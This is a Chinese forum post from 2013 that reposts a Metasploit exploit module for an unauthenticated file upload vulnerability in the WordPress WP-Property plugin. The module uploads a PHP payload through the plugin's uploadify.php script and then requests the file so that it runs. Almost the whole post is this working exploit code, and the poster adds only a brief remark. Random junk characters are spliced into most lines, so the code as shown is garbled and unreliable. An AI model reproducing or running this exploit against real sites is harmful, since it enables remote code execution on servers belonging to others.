WordPress WP-Property PHP 文件上传漏洞
% E! ]' Y) j) W6 g. ?3 {6 H! e% u$ l
## # This file is part of the Metasploit Framework and may be subject to* x+ L+ j/ k' [6 p* c
5 g7 Y7 [6 Q! q
# redistribution and commercial restrictions. Please see the Metasploit! Y# K8 t/ k7 O+ q9 a
3 U% B0 U7 R: y5 @' @
# Framework web site for more information on licensing and terms of use.
" d$ a2 Z7 E. X
6 U3 P* S6 n& Y' k" r# http://metasploit.com/framework/ ## n8 T& ?8 H6 I- N2 d+ M, J+ z
5 }# M- y+ U6 O8 _4 p w
# m9 N7 A# x9 r3 e
/ j0 q1 o3 R Y
+ b2 X* g2 `6 C1 z: T
4 q8 h+ [' q4 P2 O; F4 F4 t6 Erequire 'msf/core'
1 m, ?! Y4 G/ ?, Z# Xrequire 'msf/core/exploit/php_exe'' s) O. j+ Z5 J) B7 X, |
% O* a1 [% C# O% Pclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
$ `. l9 P$ A- y( R1 V$ ~* g'Description' => %q{
7 ]) g( a/ ?! T$ B* Q: uThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
9 h2 ^$ f1 ?1 }4 H/ z' J[- V6 l+ {7 C9 i
'Sammy FORGIT', # initial discovery
, ]9 S9 r9 m* }8 C( L* n: a8 h. Q'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ u+ ~- y( y1 z0 e! B4 d$ h
],8 e6 t! o+ n0 ~, h) [, }4 O, v
'License' => MSF_LICENSE,
) M) v6 D8 } J2 V'References' =>. I! |- k8 y$ O2 T
[
' v6 D0 o& I; N1 s0 s l+ a n! [[ 'OSVDB', '82656' ],
! L8 F, b5 _7 K[ 'BID', '53787' ],; V# ]7 [/ Z( T, F) d: K+ ~
[ 'EDB', '18987'],
9 r, y2 z- |. w* ^[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
9 @6 J3 ]1 z, D* ]7 y# c' Z2 ]],
6 F% y2 @0 N3 c H$ U( y: c! x'Payload' =>2 K$ M: _2 Y' [: Y3 u
{
7 o# ^+ D2 w' M3 L- x/ j'BadChars' => "\x00",; f, r0 _. p1 L
},# p% o# c3 e1 U& {! d4 v7 T( z
'Platform' => 'php',
g7 X' L J# {( r. G% G0 }1 b'Arch' => ARCH_PHP,
; M0 |% e. z( i2 f1 h q'Targets' => ~% }% G# x. P. D( u$ z
[
: y; l6 u9 j' u, M. j[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],' M# k" O7 F' |
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
0 K8 J# m, P4 d/ ]. m, P3 a],, V- P/ G# X ^ h
'DefaultTarget' => 0,8 f9 Z+ x0 f1 y2 `: p1 B: {5 A- U
'DisclosureDate' => 'Mar 26 2012'))) x7 f: [8 V- U5 [! E' Y& }) K
3 S1 f) \6 L3 S$ B+ }% Q1 Xregister_options(8 k* A4 h+ u( v
[
) Z1 ]; y: u$ |& `, T; \& G+ lOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" u2 [& d- z1 L' w2 A8 t |& K, \], self.class)
! C- I- d& `$ D; {4 F Qend
+ y5 X- n) W& J! Z7 b) E: F7 Z" Z! o9 i. _. g& A) u& h% j
def check# N7 @( p/ ^0 ^( R$ ]
uri = target_uri.path
! |/ @$ r0 L% E' w$ Suri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
4 _& B" N0 a8 `- g3 k3 `0 W2 u'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"3 v, J) d T5 ^1 f9 j/ y' l1 o
})
$ G+ r; H) r" y& ^3 W* _; }, P- J8 D/ i* w
if not res or res.code != 200
. j& q! b+ k7 V/ o3 Z. Creturn Exploit::CheckCode::Unknown
9 |) M8 P4 n% _end8 |( x3 B/ p0 l9 h* c6 _5 K! m
* V3 V) J: B; H: F# mreturn Exploit::CheckCode::Appears5 T: x; w' C& J* w* w
end
4 V7 ^ b: s8 N$ f6 G4 p9 S* O; ~# b( _# O
def exploit, h; [; C8 }4 Y( A, ]( w6 D
uri = target_uri.path
. O S4 R; |' Z) a. ?# o3 }uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)' [( r3 V6 \8 F8 x# B
$ Y# f6 h: b* ?! K. hdata = Rex::MIME::Message.new
) h3 h" g9 ^+ |6 _% x0 bdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
1 S9 u9 G- {6 t/ Qdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")0 \' b$ C/ {! E
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- N/ _2 m+ Q5 X7 y. k
+ I- _" I: W; R9 j7 K& r
print_status("#{peer} - Uploading payload #{@payload_name}"), W9 c1 S: j' v6 m7 \0 h( C
res = send_request_cgi({
+ G8 D1 H: ~: |& M'method' => 'POST',
# [. m- i' b: K'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",# v+ `9 k& i2 J
'ctype' => "multipart/form-data; boundary=#{data.bound}",
9 P- V4 e7 {, L" W; Z1 o& j0 k'data' => post_data8 U& q" K+ u/ }, Q9 L' @& R9 m/ c
})5 S4 I) M! T) ]5 e- W6 k
# D) R6 E7 |9 r2 cif not res or res.code != 200 or res.body !~ /#{@payload_name}/
5 O- V( P; m W0 R/ {8 U7 h3 z0 zfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")! H& }9 G# ~8 |0 ~
end6 C' f* W$ { J! S! C
4 A2 p) E% s8 y9 b3 a
upload_uri = res.body+ k$ {# T# ]7 h4 j k
' t# ]$ t; L6 K$ C
print_status("#{peer} - Executing payload #{@payload_name}")
- H K1 l; J* z; \2 ~; y% Vres = send_request_raw({7 s: ?7 F; z: F7 v0 W! r9 q4 `
'uri' => upload_uri,- ]/ n8 g5 Y* ?! [* Y( W
'method' => 'GET'1 ?( `$ c( |# T( e
})
1 t" m$ \0 x; k7 [- u: |1 L! iend
9 i* e& L& f0 q* W4 R1 jend5 y' L3 m" Q# f) s& n
4 [- y2 H: r! k; W, A
不要问我这写的是什么 怎么利用 我是说msf.
& F2 M% y/ w a. }: y
3 P0 U2 i( Q$ z* A; Q0 c |
发表于 2013-1-4 19:51:30
收藏
支持
反对